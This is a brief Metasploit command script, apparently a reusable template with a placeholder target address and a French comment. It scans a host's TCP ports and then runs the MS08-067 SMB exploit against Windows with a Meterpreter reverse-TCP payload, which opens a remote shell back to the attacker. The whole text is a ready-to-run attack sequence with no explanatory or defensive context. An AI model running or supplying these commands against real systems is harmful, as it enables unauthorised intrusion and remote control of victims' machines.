use auxiliary/scanner/portscan/tcp
set RHOSTS __TARGET_IP__
set THREADS 10
run

use exploit/windows/smb/ms08_067_netapi
set RHOST __TARGET_IP__
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST __TARGET_IP__  # ou ton IP d’écoute
exploit -j
